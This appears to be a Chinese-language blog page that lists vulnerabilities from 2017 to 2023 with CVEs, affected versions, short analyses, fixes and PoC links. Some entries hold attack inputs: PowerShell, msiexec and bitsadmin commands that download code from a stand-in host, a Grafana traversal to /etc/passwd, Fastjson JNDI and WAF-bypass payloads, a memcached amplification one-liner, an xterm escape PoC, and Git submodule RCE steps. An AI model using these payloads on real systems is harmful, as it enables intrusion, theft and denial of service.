Latest Vulnerabilities

Reading time ~10 minutes

欢迎订阅

欢迎订阅我的微信公众号

2023

  1. 【20231129】Apache ActiveMQ RCE漏洞 CVE-2022-41678
    • 2023年11月,Apache发布新版本修复漏洞
    • 登录后的攻击者,可以利用 /api/jolokia 接口来执行一系列的操作,写入Webshell
    • 影响范围:< 5.16.6、< 5.17.4 受影响, 5.18.0 不受影响,6.0.0 不受影响
    • jetty 允许 org.jolokia.http.AgentServlet 处理对 /api/jolokia 的请求
    • org.jolokia.http.HttpRequestHandler#handlePostRequest 能够通过 JSONObject 创建 JmxRequest。并调用 org.jolokia.http.HttpRequestHandler#executeRequest。可以通过Java 11以上版本上存在的jdk.management.jfr.FlightRecorderMXBeanImpl来实现RCE。1 调用 newRecording. 2 调用setConfiguration。其中隐藏着一个webshell数据,3 调用startRecording、stopRecording,4 调用 copyTo 方法写入 Webshell 到 jsp 文件
    • 缓解措施:限制(默认情况下)Jolokia 上授权的操作,或禁用 Jolokia
  2. 【20231122】iDocView /html/2word 远程代码执行漏洞
    • iDocView /html/2word 远程代码执行漏洞
    • 本次漏洞出现在在线文档解析应用中的远程页面缓存功能。具体问题在于该应用未能对用户输入的URL进行充分的安全验证,从而导致存在安全隐患。攻击者可通过构造特殊的URL,引诱应用下载恶意文件。
    • iDocView < 13.10.1_20231115
  3. 【20231031】Atlassian Confluence 权限绕过代码执行漏洞 CVE-2023-22518
  4. 【20231025】Apache ActiveMQ RCE
    • 影响范围 < 5.18.3, < 5.17.6, < 5.16.7, < 5.15.16
    • 默认端口 61616
  5. 【20231011】Curl溢出漏洞(实用性一般)
  6. 【20230911】libwebp (WebP) 堆缓冲区溢出漏洞 CVE-2023-4863 CVE-2023-41064
    • PoC:https://github.com/mistymntncop/CVE-2023-4863
    • 漏洞分析:https://mp.weixin.qq.com/s/zqxkYk7vRvDPKxgoVj1PRw
    • webp图片的处理代码逻辑中。当解析一个无损格式的webp图片时,解码器采用了范式霍夫曼编码 (Canonical Huffman Code) 算法,首先从图片流中读取前缀编码的数据,基于此数据构建一个完整的霍夫曼编码表,随后依照这个编码表对图片流中的压缩数据进行解码,得到原始的图像。
    • 解码器以为图片中保存的霍夫曼编码表数据是合理的,因此提前计算了这一情况下能够容纳的最大内存长度。而霍夫曼编码表数据是来自不受信任源的,是可以由攻击者任意构造的,且编码器不会对这些数据进行有效性检查。因此,如果攻击者能够构造出一个非法的霍夫曼表,包含了大量的长编码,这将导致解码器将分配过多的二级表,使得霍夫曼表的总内存大小超过分配大小,发生堆缓冲区溢出。
    • 该漏洞发生在一个基础库中,影响范围非常广。
  7. 【20230726】Citrix ADC&Citrix Gateway RCE漏洞 CVE-2023-3519
  8. 【20230725】Ivanti Mobileircon RCE
  9. 【20230722】Metabase 前台 RCE CVE-2023-38646
  10. 【20230711】Ghostscript RCE 漏洞CVE-2023-36664
  11. 【20230707】Linux内核提权 StackRot (CVE-2023-3269)
  12. 【20230601】Apache RocketMQ 远程命令执行漏洞(CVE-2023-33246)
  13. 【20230525】Nacos内网集群Raft反序列化漏洞
  14. 【20230415】Windows 消息队列服务 RCE CVE-2023-21554
  15. 【20230428】Exchange RCE漏洞 CVE-2023-21707
  16. 【20230420】PostgreSQL权限提升漏洞
    • 当攻击者拥有PostgreSQL数据库的普通账号权限后,可以在PostgreSQL数据库上创建一个恶意函数(函数内容为执行恶意命令)用于覆盖劫持正常函数,随后安装插件(安装插件时候会以最高权限执行该恶意函数),造成服务器被入侵控制。
    • 修复方案:禁止pg_bigm、postgis插件安装
    • https://cloud.tencent.com/document/product/409/90358
  17. 【20230419】MySQL Server远程拒绝服务漏洞 CVE-2023-21912
    • Oracle MySQL Server中存在漏洞,允许未经身份验证的攻击者通过多种协议对MySQL Server进行利用,进而导致MySQL Server崩溃。
    • https://nvd.nist.gov/vuln/detail/CVE-2023-21912
  18. 【20230327】OpenAI存在Web Cache Deception漏洞

  19. 【20230327】影响ChatGPT,redis-py 信息泄露漏洞(CVE-2023-28858)
    • 使用redis-py时,如果在不恰当的时候取消异步Redis命令,会导致连接未关闭,这会产生响应的错位,即后续命令会获取到之前命令的响应。
    • https://github.com/redis/redis-py/issues/2624
    • https://github.com/redis/redis-py/issues/2665
  20. 【20230324】ImageMagic文件读取漏洞 CVE-2022-44268
    • ImageMagick 图像处理软件7.1.0-49版本存在信息泄露漏洞,成功利用该漏洞可在解析图像时从服务器读取任意文件,可升级到ImageMagick 7.1.0-52版本
  21. 【20230323】MinIO 信息泄露漏洞(CVE-2023-28432)
    • 未经身份认证的远程攻击者通过发送特殊HTTP请求即可获取所有环境变量,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,造成敏感信息泄露,最终可能导致攻击者以管理员身份登录MinIO。
    • https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z
    • https://mp.weixin.qq.com/s/BPUEAGTbNaQhlXMMLbvpkw
  22. 【20230310】Apache Dubbo RCE 反序列化漏洞CVE-2023-23638
  23. 【20230208】Apache Kafka远程代码执行漏洞 CVE-2023-25194

2022

  1. 【20221111】YAPI命令执行
  2. TCP/IP 漏洞 CVE-2022-34718 PoC
  3. 【20221013】Apache Commons Text RCE CVE-2022-42889漏洞
  4. 【20220930】Exchange RCE
  5. 【20220921】CobaltStrike Beacon XSS RCE CVE-2022-39197
  6. 【20220827】Chrome 2022年在野利用的漏洞
  7. 【20220706】OpenSSL 远程代码执行漏洞(影响有限)
  8. 【20220705】Django SQL注入
  9. 【20220622】Microsoft Windows DFSCoerce 域控提权漏洞
  10. 【20220610】PHP M有SQL、Postgre 函数存在RCE漏洞 CVE-2022-31626、CVE-2022-31625
  11. 【20220603】Confluence OGNL 命令注入漏洞CVE-2022-26134
  12. 【20220531】Microsoft Office命令执行 Follina
  13. 【20220523】FastJson <=1.2.80反序列化漏洞,绕过autotype
  14. 【20220429】微软Azure Postgre 存在 “ExtraReplica” 漏洞
  15. 【20220330】Spring Core RCE 0day漏洞 CVE-2022-22965
  16. 【20220325】Spring Cloud Function Spel 表达式注入
  17. 【20220317】OpenSSL证书解析拒绝服务漏洞 CVE-2022-0778
    • 影响版本:OpenSSL版本1.0.2:1.0.2-1.0.2zc、OpenSSL版本1.1.1:1.1.1-1.1.1m、OpenSSL版本3.0:3.0.0、3.0.1
  18. 【20220317】供应链攻击 node-ipc
    • 一共有两个问题,1. ssl-geospec.js 恶意文件,会覆盖文件。 2. peacenotwar 依赖,会创建反战文件。
    • 影响版本:ssl-geospec.js(影响10.1.1、10.1.2),peacenotwar(影响 9.2.2、11.0.0、11.1.0)
    • 事件分析:https://mp.weixin.qq.com/s/6gbuBytsehzaMYwx-PxJ9w
    • 2022-03-07 10.1.1 引入了 ssl-geospec.js,2022-03-08 10.1.3 中删除了 ssl-geospec.js https://github.com/RIAEvangelist/node-ipc/commit/cc282c2b06c98eb0a01543639ac8d117476dc4c8
    • ssl-geospec.js代码:https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
    • ssl-geospec.js的功能是如果安装用户的ip是俄罗斯或者白俄罗斯的,则遍历./,../,../../,/ 等四个目录下的文件,并在文件中覆盖写入 ❤ 其中查询ip位置的url: https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154已经无效,ssl-geospec.js功能不起作用。

    • 作者在 node-ipc 代码中加入了 peacenotwar 依赖,影响 9.2.2、11.0.0、11.1.0 版本。vue-cli 会 用到 node-ipc,受到影响。
    • peacenotwar代码:https://github.com/RIAEvangelist/peacenotwar
    • peacenotwar 包的功能会在 Desktops、OneDrive、OneDriveDesktops 创建 WITH-LOVE-FROM-AMERICA.txt 文件。
    • 有开发者提供了该问题的解决方式:首先按照 readme 正常 install,构建结束后,用编辑器全局搜索’peacenotwar’,将其全部删除;然后在项目的 node_models 目录下,将’peacenotwar’目录删除;之后将’项目 /node_modules/node-ipc/node-ipc.js’这个文件中引用’peacenotwar’的代码注释掉,便可以正常启动项目。
  19. 【20220308】Linux Dirty Pipe提权漏洞 CVE-2022-0847
    • 漏洞详情:https://dirtypipe.cm4all.com/
    • https://www.bleepingcomputer.com/news/security/new-linux-bug-gives-root-on-all-major-distros-exploit-released/
    • 影响版本:Linux Kernel 版本 >= 5.8、Linux Kernel 版本 < 5.16.11 / 5.15.25 /5.10.102
  20. 【20220302】Spring Cloud Gateway Server 存在表达式注入漏洞 CVE-2022-22947
  21. 【20220216】钉钉客户端RCE漏洞

  22. 【20220215】向日葵RCE漏洞

  23. 【20220206】Linux容器逃逸漏洞 CVE-2022-0492
  24. 【20220125】APISIX batch-requests插件默认Key命令执行漏洞
  25. 【20220125】Linux pwnkit提权漏洞CVE-2021-4034【好用】
  26. 【20220119】Linux内核提权、容器逃逸 CVE-2022-0185
  27. 【20220111】Alibaba Dubbo Hession-lite反序列化漏洞 CVE-2021-43297

2021

  1. 【20211209】Log4j JNDI注入代码执行漏洞
  2. 【20211213】Grafana文件读取漏洞
    • /public/plugins/graph/../../../../../../../../../../../../../../../etc/passwd
  3. 【20211117】Gitlab RCE漏洞CVE-2021-22205
  4. 【20211115】Hadoop Yarn RPC未鉴权
  5. 【20210905】GhostScript 9.50 RCE
  6. 【20210720】Linux内核提权漏洞 Sequoia CVE-2021-33909
  7. 【20210715】Linux内核提权漏洞 CVE-2021-22555
  8. 【20210630】域控漏洞PrintNightmare CVE-2021-1675
  9. 【20210326】OpenSSL拒绝服务漏洞 CVE-2021-3449
  10. 【20210315】XStream多个命令执行高危漏洞
  11. 【20210311】F5 BIG-IP命令执行漏洞CVE-2021-22986
  12. 【20210303】Exchange RCE CVE-2021-26855 CVE-2021-27065 ProxyLogon
  13. 【20210129】Apache Druid RCE漏洞CVE-2021-25646
  14. 【20210127】Sudo溢出提权漏洞CVE-2021-3156
  15. 【20210126】SonicWall SSL-VPN 远程命令执行

2020

  1. 【20201116】XStream反序列化漏洞CVE-2020-26217
  2. 【20201029】Weblogic Console代码执行漏洞CVE-2020-14882
  3. 【20201027】xxl-job 执行器未授权 RCE
  4. 【20200811】Windows域控提权CVE-2020-1472 ZeroLogon
  5. 【20200808】vBulletin 5.x 远程代码执行漏洞
  6. 【20200731】GRUB2缓冲区溢出漏洞CVE-2020-10713
  7. 【20200716】Apache Kylin命令注入漏洞CVE-2020-13925
  8. 【20200715】Windows DNS Server命令执行漏洞CVE-2020-1350
  9. 【20200703】F5 BIG-IP的流量管理用户页面TMUI存在Java代码执行漏洞 CVE-2020-5902
  10. 【20200623】Apache Dubbo反序列化漏洞CVE-2020-1948
  11. 【20200602】FastJson反序列化漏洞,绕过Autotype
    • 影响1.2.69以下版本
    • 通过expectClass绕过Autotype限制
    • 需要目标服务器上存在可利用的Gadget,才能进行命令执行
    • https://paper.seebug.org/1236/
  12. 【20200525】Nexus Repository Manager 后台 RCE (CVE-2020-10199)
    • 受影响版本:Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
    • 在Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某处功能安全处理不当,导致经过授权认证的攻击者,可以在远程通过构造恶意的 HTTP 请求,在服务端执行任意恶意代码、执行了不安全的EL表达式,从而获取到系统权限。
    • https://github.com/fofapro/vulfocus
    • docker pull vulfocus/nexus-cve_2020_10199
    • https://github.com/vulhub/vulhub/blob/master/nexus/CVE-2020-10199/README.md
  13. 【20200501】SaltStack认证绕过远程命令执行
  14. 【20200401】Liferay 反序列化漏洞 CVE-2020-7961
  15. 【20200312】微软SMBv3蠕虫级远程命令执行漏洞CVE-2020-0976
  16. 【20200226】Exchange服务器命令执行漏洞RCE CVE-2020-0688
    • 官方公告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688
    • 漏洞分析:https://nosec.org/home/detail/4158.html
    • PoC: https://github.com/Jumbo-WJB/CVE-2020-0688/blob/master/CVE-2020-0688.py
    • 注意:CU12也受影响
    • 描述:Exchange安装时使用了静态密钥,在获取一个普通用户的登陆session之后,攻击者可以利用Exchange的静态密钥构造ViewState,从而发送恶意序列化Payload来执行命令。注意,CU12版本也受影响。攻击的目标CGI为:/ecp/default.aspx
    • 其他:一般Exchange服务器部署在内网,可以通过ping、nslookup等命令利用dnslog探测。如果有外网的话,可以使用powershell、msiexec、bitsadmin、telnet等命令进行外连探测,不过bitsadmin、powershell、msiexec等容易被拦截或检测。
    • powershell.exe -nop -c “IEX ((new-object net.webclient).downloadstring(‘http://example.com/test’))”
    • msiexec /q /i http://example.com/test
    • bitsadmin /transfer n http://example.com/test C:\test
  17. 【20200220】Tomcat AJP文件包含漏洞CVE-2020-1938
  18. 【202002】Dubbo HTTP反序列化漏洞CVE-2019-17564​
    • Dubbo是一个RPC框架,支持多种交互协议。漏洞没什么好说的,一个反序列化输入点,有Gadget就能打。
    • Dubbo HTTP借助了 Spring 提供的 HttpInvoker 封装了 refer 和 exporter 的逻辑。HttpInvoker中直接readObject()没什么防护。访问Dubbo HTTP的RPC接口地址,直接Post反序列化payload搞定。
  19. 【20200115】Weblogic命令执行漏洞CVE-2020-2546、CVE-2020-2551
    • 漏洞信息:https://mp.weixin.qq.com/s/Q-ZtX-7vt0JnjNbBmyuG0w
    • CVE-2020-2546,通过T3协议实现利用、攻击者可通过此漏洞实现远程代码执行
    • CVE-2020-2551,攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码(该漏洞可以绕过Oracle官方在2019年10月份发布的最新安全补丁)。
    • PoC:暂无
  20. 【20200115】Windows核心加密库严重漏洞可绕过证书签名CVE-2020-0601

2019

  1. 【20191220】Apache Log4j 1.2 SocketServer 反序列化漏洞CVE-2019-17571
  2. 【20191130】MySQL JDBC Deserialization 反序列化RCE
  3. 【20191119】Apache Solr默认配置对外开放JMX端口导致命令执行CVE-2019-12409
  4. 【20191112】Flink未鉴权RCE
  5. 【20191107】Squid缓冲区溢出远程代码执行CVE-2019-12526
  6. 【20191031】Apache Solr Velocity模版注入RCE漏洞
  7. 【20191023】Apache Shiro Padding Oracle漏洞 CVE-2019-12422
  8. 【20191023】PHP远程命令执行漏洞CVE-2019-11043
  9. 【20191017】Kibana < 6.6.0 控制台命令执行漏洞
  10. 【20191010】iTerm2存在严重漏洞可导致远程命令执行
  11. 【20190905】FastJson拒绝服务漏洞 影响版本<1.2.60
    • FastJson在处理\x转义字符时没有进行格式判断,攻击者可以向服务器发送恶意请求,导致CPU/RAM过载。
    • PoC:{"a":"\x"}
  12. 【20190814】MSCTF提权漏洞,影响XP到Win10所有版本
  13. 【20190814】Windows RDP蠕虫漏洞CVE-2019-1181、CVE-2019-1182
  14. 【20190801】Apache Slor RCE CVE-2019-0193
  15. 【20190730】iMessage远程获取文件CVE-2019-8646
  16. 【2019-07-22】ProFTPd任意文件拷贝漏洞CVE-2019-12815
  17. 【2019-07-10】Fastjson反序列化命令执行,1.2.48以下Autotype绕过
    • com.alibaba.fastjson.serializer.MiscCodec 定义了特定class的序列化与反序列化逻辑,包括java.lang.Class等。利用java.lang.Class可以实例化 com.sun.rowset.JdbcRowSetImpl。由于Fastjson的缓存特性,在利用com.sun.rowset.JdbcRowSetImpl进行JNDI注入时,直接从缓存表中取对象实例,则可以绕过autotype限制。
    • PoC: https://raw.githubusercontent.com/kxcode/snippet/master/FastJson1.2.47.txt
    • 检测:java.net.InetAddress类在fastjson 1.2.48中被加入了autotype黑名单,如果dnslog服务器成功收到请求,则说明目标fastjson版本低于1.2.48。Payload如下:{"@type":"java.net.InetAddress","val":"inetaddress.fastjson.rxxoow.ceye.io"}
    • WAF绕过:@type关键字可以用\u0040type绕过
    • 总结:https://www.freebuf.com/vuls/208339.html
  18. 【20190615】Weblogic漏洞CVE-2019-2725绕过
    • TODO
  19. 【20190615】Windows NTLM认证漏洞CVE-2019-1040
  20. 【20190522】Windows10提权0day
  21. 【20190515】Windows RDP远程命令执行CVE-2019-0708 BlueKeep
  22. 【20190418】Weblogic反序列化命令执行漏洞 CVE-2019-2725
  23. 【20190406】Apache Confluence命令执行漏洞 CVE-2019-3395 CVE-2019-3396
    • 公告:https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
    • 漏洞分析:https://paper.seebug.org/884/
    • 描述:Confluence通常是一个用于企业内部的知识库和Wiki工具,在服务端模板渲染时存在漏洞,可导致任意文件读取、远程对象加载和RCE。漏洞点处在Widget Connector(小工具连接器)这个功能上。用户在创建文档时,可以在文章中嵌入一些视频、文档之类的(比如:Youtube视频、Flickr幻灯片、Google文档等内容),服务端会根据用户传入的远程资源URL进行渲染,此时用户可以手工传入_template参数,指定服务端模板文件,使服务端加载恶意的远程模板文件,在模板文件中利用Java反射达到命令执行的效果(模板引擎是velocity)。也可以将_template设置为服务器上的文件,从而读取文件内容,如:/WEB-INF/web.xml或者../web.xml
    • POC https://github.com/kxcode/snippet/blob/master/CVE-2019-3396.md
    • 影响范围: https://www.freebuf.com/news/200183.html
    • 漏洞利用不需要登录
  24. 【20190403】Apache Http Server提权漏洞 CVE-2019-0211
  25. 【20190307】Apache Solr 命令执行漏洞 CVE-2019-0192
  26. 【20190307】Chrome ‘FileReader’ Use After Free命令执行漏洞CVE-2019-5786
  27. 【20190221】WinRAR命令执行漏洞CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253
  28. 【20190220】Wordpress5.0.0命令执行漏洞
  29. 【20190213】Nexus Repository Manager 3 访问控制缺失及远程代码执行CVE-2019-7238
  30. 【20190213】runc Docker逃逸漏洞CVE-2019-5736
  31. 【20190124】Numpy库存在反序列化命令执行漏洞CVE-2019-6446
  32. 【20190122】apt/apt-get 远程命令执行漏洞披露(CVE-2019-3462)
  33. 【20190115】ThinkPHP 5.1~5.2 RCE漏洞
  34. 【20190110】xterm.js 命令执行漏洞CVE-2019-0542
    • POC:echo -e "abcdef\x1bP+qfoo;\ntouch /tmp/foo;aa\n\x1b\n"
    • 在xterm终端下可逃逸并执行命令。利用场景:受害者执行curl http://xxx/xxx.txt,服务端返回的内容包含上述特殊字符,于是回显的数据逃逸了xterm的终端,并额外执行了命令。

2018

  1. 【20181221】Windows越权任意文件读取0day
  2. 【20181220】微软发布补丁修复一个在野利用的IE漏洞 CVE-2018-8653
  3. 【20181210】ThinkPHP发布V5.1.31、V5.0.23安全更新,修复Getshell漏洞
  4. 【20181205】Kubernetes API特权提升漏洞CVE-2018-1002105
  5. 【20181205】Flash命令执行漏洞CVE-2018-15982
  6. 【20181128】PHPCMS 2008 任意文件写入 RCE CVE-2018-19127
  7. 【20181127】Consul服务接口存在RCE漏洞
  8. 【20181113】严重,Exchange Server账号冒用,盗用任意用户邮件CVE-2018-8581
  9. 【20181106】GOGS/Gitea任意代码执行(CVE-2018-18925/6)及利用流程
    • 漏洞分析:https://xz.aliyun.com/t/3168 https://www.anquanke.com/post/id/163575
    • Gogs 是一款极易搭建的自助 Git 服务。 Gogs 的目标是打造一个最简单、最快速和最轻松的方式搭建自助 Git 服务,使用 Go 语言开发。
    • Gitea是从Gogs发展而来,同样的拥有极易安装,运行快速的特点,而且更新比Gogs频繁很多,维护的人也多。
  10. 【20181106】Struts 2.3.36使用了1.3.2版本的commons-fileupload组件,存在反序列化命令执行漏洞
  11. 【20181019】Oracle Weblogic远程代码执行漏洞CVE-2018-3191
    • 描述:这个漏洞利用的gadget是weblogic中自带的,跟JDK版本无关,所以只要系统能连外网,未禁止T3协议,漏洞就可以利用,威力巨大。
    • 漏洞分析:https://www.anquanke.com/post/id/162274
  12. 【20181017】LibSSH 0.6及更高版本认证绕过漏洞
  13. 【20181010】GhostScript命令执行漏洞Bypass CVE-2018-17961
  14. 【20181009】CVE-2018-8453 Win32k Elevation of Privilege Vulnerability
  15. 【20181007】MikroTik RouterOS未授权文件读取到GetShell
    • https://www.freebuf.com/vuls/187272.html
  16. 【20180930】GoogleProjectZero Linux内核提权 VMA-UAF 漏洞CVE-2018-17182
  17. 【20180919】交易前端图表通用JS组件 Tradingview 存在XSS漏洞
  18. 【20180912】Microsoft XML Core Services MSXML Remote Code Execution CVE-2018-8420
  19. 【20180905】ECShop全版本命令执行漏洞
  20. 【20180829】Windows ALPC 本地提权 CVE-2018-8440
  21. 【20180822】UEditor两个版本上传漏洞
  22. 【20180822】Struts2 命令执行漏洞 S2-057 CVE-2018-11776
  23. 【20180822】GhostScript沙盒绕过命令执行,影响ImageMagick CVE-2018-16509
  24. 【201808】Windows提权 CVE-2018-8120
  25. 【20180817】在野利用的 VBScript 引擎 UAF 漏洞 CVE-2018-8373
  26. 【20180815】OpenSSH用户枚举漏洞CVE-2018-15473
    • 描述:OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。攻击者可通过发送特制的请求利用该漏洞枚举用户名称。
    • POC:
  27. 【20180815】Microsoft Exchange Server 远程代码执行 CVE-2018-8302
  28. 【20180815】Intel CPU再爆芯片级漏洞 L1TF推测执行侧信道攻击漏洞 (L1 Terminal Fault Speculative)
  29. 【20180801】HP Ink Printers Remote Code Execution CVE-2018-5924, CVE-2018-5925
  30. 【20180808】Linux内核DoS漏洞 SegmentSmack CVE-2018-5390
    • CVE-2018-5390
  31. 【20180725】Jenkens任意文件读取漏洞 CVE-2018-1999002
  32. 【20180718】Weblogic未授权任意文件上传 CVE-2018-2894
  33. 【20180718】Weblogic反序列化漏洞 CVE-2018-2893
  34. 【20180703】Wechat Pay SDK XXE漏洞
  35. 【20180604】Microsoft JScript命令执行漏洞 CVE-2018-8267
  36. 【20180605】Zip Slip漏洞
  37. 【20180601】 Git submodule RCE漏洞 CVE-2018-11235
    • 描述:Git没有对子模块名称进行过滤,存在目录穿越漏洞。攻击者可以通过配置恶意的.gitmodules文件,将Git Hooks脚本文件推送到了客户端中,当用户在使用’git clone –recurse-submodules’时,触发RCE。
    • 漏洞点说明:通过路径穿越,可以设置任意目录为子模块的.git目录。而在这一目录下放入hooks/post-checkout等恶意hooks脚本,即可达到RCE的效果。
    • 漏洞分析:https://xz.aliyun.com/t/2371
    • 漏洞分析:https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
    • 漏洞分析:https://atorralba.github.io/CVE-2018-11235/
    • POC:https://github.com/Rogdham/CVE-2018-11235
    • 影响范围: Git version < 2.13.7、Git version 2.14.x < 2.14.4、Git version 2.15.x < 2.15.2、Git version 2.16.x < 2.16.4、Git version 2.17.x < 2.17.1
    • 修复版本:Git version 2.14.4、2.15.2、2.16.4、2.17.1
    • 前置知识:
      1. .git/hooks文件夹下存放了Git Hooks脚本,本质上就是Shell脚本,在某些情况下会被Git调用。比如:在执行git checkout时会自动调用post-checkout脚本。这些Hooks脚本存放在客户端,clone项目时不会传递这些hook脚本。
      2. 主项目根目录的子模块文件夹下有一个.git文件,文件内容是这个子模块的.git目录路径。而这个路径通常指向了主项目的.git/modules目录,该目录下每一个文件夹对应的存放了各个子模块的.git目录的文件。而Git在解析.gitmodules文件时,会把子模块的名称,拼接到.git/modules/后面,当作子模块的.git目录路径。也就是这里导致了本次RCE漏洞。
      3. .gitmodules文件说明:https://git-scm.com/docs/gitmodules
      4. Git子模块工具:https://git-scm.com/book/en/v2/Git-Tools-Submodules
    • 利用流程:
      1. 创建恶意项目repo
      2. 添加一个恶意的子模块,命名为evil。git submodule add some_repo_address evil
      3. 将目录.git/modules/evil拷贝到主项目根目录的testdir/evil文件夹下。
      4. testdir/evil目录中的hooks目录添加恶意hook脚本。
      5. 配置.gitmodules,设置子模块的update参数为checkout,从而在子模块update时触发post-checkout脚本。(注:If you pass --recurse-submodules to the git clone command, it will automatically initialize and update each submodule in the repository.)
      6. 配置.gitmodules,使子模块的name../../testdir/evil,使子模块的Git目录指向主项目根目录下的testdir/evil
      7. 受害者git clone --recurse-submodules repo时触发RCE。
  38. 【20180529】EOS节点代码执行漏洞
  39. 【20180516】DHCP命令注入漏洞
  40. 【20180515】内核提权漏洞,程序员误读Intel文档 CVE-2018-8897 CVE-2018-1087
  41. 【20180515】盘古发现ZipperDown漏洞
  42. 【20180512】Node Security - macaddress模块存在命令执行漏洞
  43. **【20180508】CVE-2018-0824 Microsoft Windows COM 远程命令执行漏洞**
    • 该漏洞可远程调用一个计算机上的COM组件,根据内容分析,作者给出的POC无法对远程主机进行复现,是由于在调用CoGetInstanceFromIStorage()时未传递计算机名(COSERVERINFO),我们可以将调用COM组件的程序嵌入office或网页中,也能够获取目标主机的系统权限。
    • 影响:Microsoft Windows Server 2008 Microsoft Windows Server 2008 R2 Microsoft Windows 7 Microsoft Windows Windows Server 2012 Microsoft Windows 8.1 Microsoft Windows Server 2012 R2 Microsoft Windows RT 8.1 Microsoft Windows 10 Microsoft Windows Server 2016
    • 分析文章:https://codewhitesec.blogspot.com/2018/06/cve-2018-0624.html
  44. 【20180508】Windows VBScript引擎远程执行代码漏洞 CVE-2018-8174
    • 描述:VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。
    • https://www.freebuf.com/column/188622.html
  45. 【20180502】7-Zip命令执行漏洞(CVE-2018-10115)
  46. 【20180418】Weblogic 反序列化远程代码执行漏洞 CVE-2018-2628
  47. 【20180410】SpringDataCommons RCE漏洞 CVE-2018-1270
  48. 【20180406】SpringMessaging RCE漏洞 CVE-2018-1270
  49. 【20180328】Drupal代码执行漏洞(CVE-2018-7600)
    • PoC:https://github.com/dreadlocked/Drupalgeddon2/blob/master/drupalgeddon2.rb
    • 描述:Drupal 使用 # 开头的变量作为内部表达式使用的变量,但未考虑到用户请求中可构造该类型变量,在多个函数调用中可能导致任意代码执行漏洞。
    • 影响:小于 7.58 的所有 7.* 版本、小于 8.5.1 的所有 8.* 版本、已停止维护的 6.* 版本
    • 修复:7.* 升级到 7.58 https://www.drupal.org/project/drupal/releases/7.58
    • 修复:8.* 升级到 8.5.1 https://www.drupal.org/project/drupal/releases/8.5.1
    • 修复:6.* 和 8.3、8.4 已经停止维护,建议升级到 8.5.1 或 7.5.8
    • 公告:https://www.drupal.org/sa-core-2018-002
  50. 【20180406】Windows提权 TotalMeltdown
    • WindowsCPU补丁导致一个新的提权漏洞
  51. 【20180330】思科Cisco SmartInstallClient缓冲区溢出漏洞及多个严重漏洞CVE-2018-0171,默认口令CVE-2018-0150
  52. 【20180329】Drupal核心远程代码执行
  53. 【20180316】Ubuntu1604提权漏洞, 漏洞相关: CVE-2017-16995
  54. 【20180315】CredSSP MS-RDP漏洞?
  55. 【20180307】Adobe Acrobat ReaderPDF远程代码执行漏洞
  56. 【20180301】Memcache DDoS反射放大攻击
    • 安全预警:https://cert.360.cn/warning/detail?id=c63eb87058834e37c7c112c35ef5f9fd
    • 漏洞分析:基于Memcached分布式系统DRDoS拒绝服务攻击技术研究http://blog.csdn.net/microzone/article/details/79262549
    • 漏洞描述:利用memcache 11211端口作为DRDoS放大器,可将流量放大五万倍左右。向未鉴权的Memcache中插入大量数据,并伪造源IP进行读取操作,从而进行反射放大攻击。
    • 相关报道:https://thehackernews.com/2018/03/biggest-ddos-attack-github.html
    • PoC: python -c “print ‘\0\x01\0\0\0\x01\0\0stats\r\n’” nc -nvvu x.x.x.x 11211 >/tmp/null
    • PoC: https://github.com/kxcode/snippet/blob/master/memcache-reflect.txt
  57. 【20180201】Adobe Flash 缓冲区溢出漏洞 CVE-2018-4878
  58. 【201802】Wordpress全版本DoS漏洞
    • CVE-2018-6389
    • 漏洞影响范围: 全版本,官方没有发补丁
    • 漏洞描述:漏洞是一个应用程序级别的 DoS攻击问题,该漏洞出现在load-scripts.php文件中,load-scripts.php文件是为WordPress管理员设计的,允许将多个JavaScript文件加载到一个请求中,通过技术分析发现可以在登录之前调用该函数来允许任何人调用它,并通过少量请求返回大数据,造成服务器资源消耗,从而导致DoS攻击。
    • PoC: https://github.com/WazeHell/CVE-2018-6389/blob/master/CVE-2018-6389.py
    • PoC: CC攻击这个URL,https://example.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core&ver=4.9.1

      load[]参数可以填如下值:eutil,common,wp-a11y,sack,quicktag,….(可参考github上的PoC)

  59. 【20180128】PHP的GD库DoS漏洞
  60. 【20180124】Electron 命令执行

  61. 【20180101】谷歌发现暴雪DNS Rebind漏洞

  62. 【20180124】SmartyPHP模板引擎命令执行RCE漏洞
    • 分析文章:https://xianzhi.aliyun.com/forum/topic/1983
    • 组件指纹:smarty_internal_runtime_codeframe.php 存在这个文件说明使用smarty
    • 修复判断:如果文件内容没有str_replace('*/','* /',$_template->source->filepath)说明没有修复
    • 扫描用例:http://smart-y.teaser.insomnihack.ch/console.php?id=*/phpinfo();/*
  63. 【20180123】Office命令执行漏洞 CVE-2018-0802
  64. 【20180118】Libc Realpath缓冲区溢出漏洞(CVE-2018-1000001),Linux提权漏洞
  65. 【20180104】Intel等CPU存在边信道内存泄露漏洞: Meltdoan,Spectre

2017

  1. 【20171222】Weblogic WLS组件 XMLDecoder反序列化漏洞 CVE-2017-10271
  2. 【20171219】GoAhead服务器CGI存在LD_PRELOAD命令执行漏洞 CVE-2017-17562
    • 影响范围:3.6.5以下版本的GoAhead,开启CGI脚本支持
